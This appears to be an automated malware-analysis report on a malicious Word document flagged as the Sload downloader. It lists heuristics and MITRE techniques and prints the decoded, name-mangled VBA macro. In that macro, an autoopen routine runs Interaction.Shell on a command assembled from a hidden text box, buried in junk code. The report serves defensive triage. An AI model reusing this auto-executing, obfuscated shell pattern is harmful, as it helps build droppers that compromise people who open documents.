Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine, together with critical heuristics such as 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC', indicates that the macro is designed to execute arbitrary code. Specifically, the 'SC_STR_CMD' and 'SC_STR_POWERSHELL' firings suggest the macro attempts to invoke system commands or PowerShell, most likely to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786417-0' further supports this downloader functionality.
Heuristics (10)

- ClamAV: Doc.Downloader.Sload-6786417-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Sload-6786417-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched lines in script:
  - `Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD`
  - `BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP)`
  - `Select Case WobDQDQUjCLRikJVzhfX`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched lines in script:
  - `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"`
  - `Sub autoopen()`
  - `fZfbF`
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11572 bytes |

SHA-256: 5e0781f7ad1abe314cf155edc1fd6ae829aac77f03b6acd5b1ea27a790e8ef64

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 309 of 350 identifiers look randomly generated (e.g. 'ulFrjJiawUvPzmCLICQmvCGF'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "XTzcjasLs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
fZfbF
End Sub
Attribute VB_Name = "XrLnRQJJqddWhD"
Function fZfbF()
On Error Resume Next
Select Case wRJzodfHKzrHOzVitsKcmjq
Case 28336665
lIasjJamAJzkaMbQKocpI = jjRAzPQFRbEQDVEO
pRUNpXtTfjMbrNPabbr = Log(jMKVurWjJJGLwNmXnwq)
XjRjEiZNpqbtNnsd = 46042415
TwBNJWdAiibrmflfDCviRQRI = ThMwJUJQpdsKKXvCEzumzDw
Case 50705491
jqichDjsWqoQCVJSbzBtU = 297703414
zbMQWWsPkFPZianHZLRn = Log(GlCdlUWFuOOqLiBVmJWd)
DLmwirnqchCFwtpKmlB = 145760435
qqBjTsmmmBuJFCaQ = Log(GdjPSjLkMpLKAYVHQNUkN)
End Select
Set wAEpfIvsqPuEfYmu = JqwHDbbmdZCppFfUui
Select Case rKlFfCkcKIlcPtbJVtki
Case 79014147
LDOaYXmvwskuwqMGrNAR = QEiYIAGupWGQLziqEd
qPMtsUwlzOCXiuLu = Log(fCPXfAHViilqiQmjnbFELqDL)
JfmzbWzFjLCOpKOEX = 91561221
LuTwQnqSGqnowDHWUUWCIm = uEjVzRqzncNAVqhWLlDsO
Case 317626379
EKiotkBLiYJYtjSsBP = 284442662
LlDmjnwKREtWwi = Log(LPczOlRfbLRnptsBdXwK)
GwHGlqudfmaLBHdYS = 186196710
uFbaPAJRYCQzCXMET = Log(rduWBwYqbomOdLvhQN)
End Select
Set VsFcZVaOnYooCKDbzTXD = BYYUfJZFDUGzZzclAVBb
Select Case ulFrjJiawUvPzmCLICQmvCGF
Case 104852227
uSMRFMkBPditKuAUJSNXGs = icaQhDriAbtPQNh
jfwWYhOsWlbsossjB = Log(hoivCwYziSQfkGcD)
sKWjwOhuwbzqHjJNFfsk = 263917251
wwZDwbqAVQkPAZibkazB = WZJWiHRiajSpPLY
Case 65103670
RFDvGiFrjjjiuSmmWbZQjNU = 161900265
ujRakNGRrIrzLQqDfz = Log(izfRfCskztMDlfZLCoR)
VdNDJvpKLiMBNvpWPPlYsdGX = 208235592
GSmEnPNBCFlcHkN = Log(YQjKpppCwnCtGsWqXEoWY)
End Select
Set vzoMtkkmHAKJEqq = ORcjIANUvKjvFDwqJS
Select Case azCMNDccczNwALsCEC
Case 146960193
zaYhRLwsiqfYiSuHwY = ToWrOYCWqDAJWZw
zbVvBFkwlRpShQlGfu = Log(iciKIPpHpdjJwj)
vjadGOEYFwikoaRtdbXQsQQN = 211186359
zuUFIrljUFjCoodE = NaiAhXkChaPFfPNzuQKD
Case 3504904
qwEFMNbnjmnnDmBLQWkCaQ = 145312446
ppTFtXTAcYjjwcKXatrc = Log(sLavjAnTzNacaPWtW)
LTmKiDVOoLMchZtLwisJKXf = 217964709
LJDVModEAjJfhjWaUMbG = Log(jAjPTsBNjnoFfTuRtb)
End Select
Set jXjsjjOzWipLDaJfIUG = vcqQsUZCNcIbkEXzzIziEui
Select Case NGLGswtzPWjDDN
Case 317598670
zGAncwTzEjTmFYjCYPtiIo = CbJqrKVavHFbiZkY
nNCJfHsrqdinTRiKu = Log(MSHbniIXizzzdnrirumDXUQz)
jrmbqbQoaYFHLa = 134419769
HdtusArwoajYqb = BIbHrWvoXjICOlXfURDPqXF
Case 52043167
zqnPsrwzjEwkTddLpVNk = 326581122
KRuOGnLBiDTbrfIYfoK = Log(ihYvBoZEBBrXiX)
VVdlKnfZvRsmwCQqZZuu = 193603507
wNSNHzcLvsTAmDCDzQCHdiJ = Log(bBlLSwodCdWQSz)
End Select
Set jzjVzSzQNoVZdrVPUDQm = ORtzDqzJjlkCjVK
Select Case ERviYisJDiDkOHdirUMBQPV
Case 286766586
TWBGbltACXiKBiCilRjSaiY = pzZkWcowEnELqCcsKkMk
TpqJXfzoYQpwWRcMIdZjmGO = Log(qoipnIqSolVJjbwzqHf)
PNUlAjBGnBHNbQTjwI = 2945696
ZXKkvSchibsfbqKcT = pHHkfmdIiSIPAiHPzsDjphDU
Case 180962310
IclkGqPzStIpsXHn = 236601212
ZPaKXLtSZkHHDnIT = Log(BWwMRABPOHHAjcCztvMk)
EaqoQisKpVhYsFRlzHPZuJEl = 119558283
IFKKrwifzwHYAVIEYlabnWl = Log(vnzLEuVEVYWnAfdk)
End Select
Set NIUiZGtRplTLqFlTwODzXb = aCCcwVDsIplaOQ
Select Case DSoJVFwEIwcQrWZoOQlYD
Case 272940126
YMWSAThulQcSnqNhKuRnfl = jmzVzlPDfOcPwznwkaDr
ODmwAibdlBKnjpfCwhJVNzEK = Log(QiXwjMbucRiKXwDoZtM)
bNJHvmstVmRzcXjzD = 219496697
oitGYzrbjGhnErs = DZPBuTiYqAjizPDksoYjiHlK
Case 21949520
JnnzMHjYjanjKUAU = 106356873
NJbTDzvPTJQvnFzjKu = Log(qnbzbicwMiDiNrNwujqkq)
wnaIlmiiaKFjZj = 249589119
zlaAilQaCEZIDzTK = Log(mqoYTzpNdDsdiSiKjkFKpVLX)
End Select
Set FjNZibqunmszljnkmFiXzYmv = TPOAGRfQZNQcozcCiqflNwDR
Const nOBksY = 0
Select Case jmkuSDKWinznHrpAiTd
Case 136736458
PpmAvnRqvaYzmEjb = IAqjmjhiEUwQvV
pNQwzuWQsjjMaqUnFYcK = Log(iidFFRrSSazFtHYomdHm)
zzCXGsjhsrTKDKjmqsdiz = 171598839
jGjiwwTuUYrhiah = YIlZijvqzoBvliHnXsSRaJni
Case 169223328
wmLdELJuEWMAYDKqlHzXIqQE = 64828483
HQYPVCAkiJiTjpmrZlbXUP = Log(jYflCoHVHTTEsWp)
JAnVBLRXHkRRfd = 255107008
sJoqpRzwaoXAQluVj = Log(SXhtFYGHdRXqpijBLjhwL)
End Select
Set CqvNoRGVqwhvLPkwDQjinjZ = wtTPaKnkYaUqwskpBIbbJ
Select Case JMvSMWiWXMTkVwYRTkJUvti
Case 4011724
abOwUNiqBXSJfNhrjZALm = zzhFCTVzPiuhmv
ZDzltUZFHnXccOUhoz = Log(bQOPKPVEHoPwbmXGWBa)
farZRirsivwFiLUDKnoWXQR = 114039684
pvqFHzjOGuBYozjXdVMsJPP = TviMEUPIahcjBnazP
Case 286695508
QSiVqIwuuFZjZfYlMPU = 63169830
itwHUzWquOcRozzpasEGaV = Log(BwCDdCOivhplZj)
VLcEzqwRljYwlWPDL = 64498236
wIStsnjjjjwNaILWsdWVME = Log(RWEGcLfiicijFDRjQTKPh)
End Select
Set TwnazXZpoisbBXnhDUBFUl = ZGTbuGBBoAiDGSCLIEpnEri
Select Case cDLzjLRifaYwLuYmF
Case 236756876
WjFwXmhXqQwsvAL = zSdiHzBpAPnHmUbJ
GikXHoLznbNhhdwAjYUbBzYi = Log(vHzZlWpowoVbnsiSj)
WoHTmqHDvHhuJFFILh = 80035092
CFYsloaYvfqJSdCqHcV = ShahHBfPVihwGJR
Case 112505020
OhzPiHPRXcfDPAjLD = 47738957
iqlkILDQwtDILlasuX = Log(jaKQkYAMFiwkCCwmZdzoEfq)
XUTTSpIooKXuTaALI = 334873604
mAIAFPwAOzjoEjtsPEjtPWKw = Log(iCTzdmfFjERPTNETptqFWTK)
End Select
Set hlGcFiQpLIbMfBlLDiX = bdvrbaacTrVLstRsfDAw
Select Case QDVqAFjYWXCDNz
Case 14286292
WnwfEKQtURiiGAH = XqOwLjruqLhLjjIonasZwhz
mcViWESWQKfWlFv = Log(vDotdFKkJuqfHhvqtIKjNJ)
ltKvYElDhiFissEchSk = 161334711
OmPiOpdcvLZlfDzTKljY = IABDDzojdQdluXGvMKPHamT
Case 207200612
MoFJWhDAlFlNfLrpvSvwAkj = 294563860
zaRQQWhWKqIjXGjZkJR = Log(hjzXSfUXisbIMlYGmj)
jDrVUiGXLLXPbPXqRb = 302794474
kBJnSOAWmhcmBniRqKioMHIM = Log(cAsovHismlhtDDFh)
End Select
Set liikOohGzGwFlctzcpOIh = ZwuOBAXnHYGcWddaNLLivAh
Select Case AiCJorBXcXlodCzfUjlt
Case 126697762
zEqRhiraTOiQwNW = SWrpwoJtDYisYzc
MsizTWJXjBEWKMEkJORO = Log(dILvwOJzwCUlwE)
iYmvMUJwkmjqTuj = 67835953
NiikXCWIAYhzklLIwGkbW = jULbINYpEOrmXT
Case 145109486
GWPnMvbzzBXhVnziLM = 328240618
YwuJjKTTHzNsmczN = Log(joktObHpqUROJbLV)
zKcFDCcIpCnfvto = 248939544
cXMTJUmUtpCEwWBWdf = Log(lGfmIlZYUJvbcdmzoIonpp)
End Select
Set KMZDqjlJROzAQwlEikwSK = OZbMWNNprzvUVZihisiAiNdd
tHUaIkk = XTzcjasLs.TextBox1.Text + wAciJ + EGDtX + bWzEvaLV + pUJJinGY + aiEEi + DkKSB + CqdYa + iFCpnQuz + opOmsjt
Select Case tqmLIOtFdOQAZsRRjjRzjw
Case 159085602
zQwRAwwWPRCqsQpmmMGV = kkWGtwzbmGwRHLsS
FhStlIpbZPriMWqCROfa = Log(HzwvdLFYkFzTKHYD)
zcjiTiGwZjGPqwMsRw = 237351975
wHwjCpKtLCPSwzOCtj = OszEczIuIkasIokVsfzciY
Case 83763926
WToQshKzlKVbwCUjtvCJk = 67158936
dOcWWvDJqfOiILs = Log(aabHwTJWpLNijV)
AMMKCQLnDhAivk = 136693081
YBtcjJDIKFFjLiVa = Log(cNVvAplOnXZzoNlUzp)
End Select
Set ptUrJEAzKfbVLaJTXwQY = HNvldKWsULMtpkbH
Select Case UCwjPhzVnlQwZrjwhMk
Case 62701598
BCBoWPFlGkdmABomclEcCfv = nKYHwRtFTjTAuutR
khAmKYpsKFafhqVGnBLqwpp = Log(XSQiorhrmkSwuadljPmMSam)
wtGtiatusJOrIGESXiswXWM = 85009957
ZHiDcYzjWkvknJLrYGk = lddLTojhqWbjtVIT
Case 68157354
PlRLlWJhjZjEzQbAmwdXko = 266583239
qAIOrSArhhrzuarGC = Log(EKAlWLEsiMqmGawAVlOuqR)
oXSZcGMEXVzjdQFiwJw = 234869250
BubQCuFGsHvnlLNEmcmWHS = Log(IqSkQHRkrhkndqIZM)
End Select
Set wfOBwsErZKhLNjj = SZjJpwaWEFBYkNiCaOJn
Select Case wMPwcuYDHJVhbfoFDjfqiLfT
Case 206558303
YSkruTpwwFuIGwAGzloYthWY = BZjOkjwThWFTQOCrijjLv
hpcMufGCqwLIstGhNYwp = Log(bumjWmhOAnNnYsumYmR)
ifJHHWIlzSKNGCGv = 271974188
XtZnqJwVTBMupmjduvkf = AiwRhcAhWlwzvOYnrpA
Case 60365705
CGYCdXjdHKKKBXPcWIjwoz = 105311353
ztYIqDGkVowXXPEF = Log(EObnntrIKVjUKwEqLE)
zXmEEaoNYrFGEaikjoZKz = 214806972
fiZPLpthMKTGwRKWNzjSREOb = Log(jOVBlukSXHWiKcYfJtwkUhS)
End Select
Set SMLTOibTzWiaXjaPjnZ = nrCWImHLSqZwvwiZ
Select Case MXwJjKICkzRVbZuVhIXLChYB
Case 223978794
ZZFtLVWkRNCNMRDdYizws = iPPLOdsiwubwljwqnvwqHjT
wFIZIuClsjvqiAHtsm = Log(HlNjUjiqDzBlzwuPI)
TVEsqFEoGMnoFwURLi = 229534311
osaDwnruzujkwYYQKPv = bfaWDPsDQfkMjjh
Case 173519319
AuCOJqMcCpjZDHwnazISEAi = 308565788
dRJXEPrwVKVttRpNtAaLiN = Log(nYFlYHqzLHajYCFwZpa)
wbuhjSFLzIiJQsWwwiSqf = 70441711
lSlQKoBAWDfcLdYF = Log(CizDYRPfjGAuXjB)
End Select
Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD
BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP)
Select Case WobDQDQUjCLRikJVzhfX
Case 35180200
kZkdXKsiXLpdjafPjqHMPF = ElpFINBuwXfDCSnjGbCfA
BEiqhzoQtaisfrhFkQW = Log(sFAXcwwKAkNajcklW)
fDFjiFYKmvwBrlIkj = 318342455
LNlBiQIMELDHvi = kTKMauwSJAMwtbRwt
Case 262077770
LEuBbPWtUwjoCSYBpZWVI = 86534094
cBRROkmOJTNXOqRiwEBdUZL = Log(jUabWWSazJRAJwHI)
jZUovKLYraRGjaDpIluKK = 290469863
BnZFYRYzztvkzrVkKODfvA = Log(OiOLBMMzXrmTBVFmHS)
End Select
Set UMnpDwmAkwHMrATLWKFW = kwYtMXTPEbwMSjHasKMOM
Select Case QawqLwTlvbzjFiWzVZFbIoT
Case 190393607
HiZWhfKUQjwXVZjjHM = KPCjuFQjPXmcGTWDOtPOwmLo
YbzzZvAcWSFEwfQQwuwdHrD = Log(WSnrzAXDOoVdRjqclzjAQwPO)
zzsPKnhXzdGIJiWvCqJJmzRE = 132091822
HHDiXDZsADfoDBoGRDkUcVN = OIGEMwfnvSfZURG
Case 20953660
RdTQOnHVjhOUzQmuzTOzU = 205263489
XrskWOlAzjlKru = Log(AVwijRRTvCsiXzrGOmcvYV)
lGujRnOFvAIStz = 249792918
kGXzidkODFaXYPwQfSMcllAj = Log(wziPizHcnrpBXTHWjcLMr)
End Select
Set fBrnbmJMwFrPlfFzZITuk = JPIwEGFIpTqPRcXrWU
Select Case OQPLbImPzvZbrLQUE
Case 94400184
TdQXwVrbiKqwCcjkAC = rGSTfGWKlAjoHzATmwt
pjjIEIzWzLaQRdXNAK = Log(QaLGbzWiwBItlGjkHZKOW)
zKZZQXdcmScOdsic = 36354091
iZwUqRoJhtPoqvOG = AjBjwFVOpRXdrGiUwfw
Case 71022157
UIlGpkNwcjAWQiwEijUd = 40476887
zQjqmkUrPRvzjY = Log(ZJVIQNlXGbciPUwch)
TIUawzcilQiaTzYoFZw = 140253874
nOtaPKCEXTpOYNPvzKYflb = Log(pfHiKaOWdMifubzjma)
End Select
Set OzsMukItGPapELtEuHj = dIwMCqhVUzblFMNXwTNtBhI
Select Case tmPTCTmiMNnFUQtU
Case 253541542
SWiLFNjkdwfCFsjWsMMq = FTSEOCTkVhZjiRZhihB
RppCJIuYwYhHvCMCMHqLQ = Log(HOGWabGpKfLHJQ)
QuGHulzARlbEXVaqpTRh = 176400183
niTRJOCwoswXwNkDVOKOplwW = TjoVnsjDUHXoccjwUwjHz
Case 163724978
GlzCWMGCjwipiNaB = 149075
UbGMPtmbPUoPOjvW = Log(kpqMqNEnrtmEktvjuiwGt)
EQvwlNUiwuIjqLJBdO = 8553705
YzzXfatjUEwPnOlaQuc = Log(TJvrwEDjZtBiFUzFQYRLUoN)
End Select
Set wsscajkjmKGODIbaXJGbDPJ = QfKscQWivBvDLbJpIR
End Function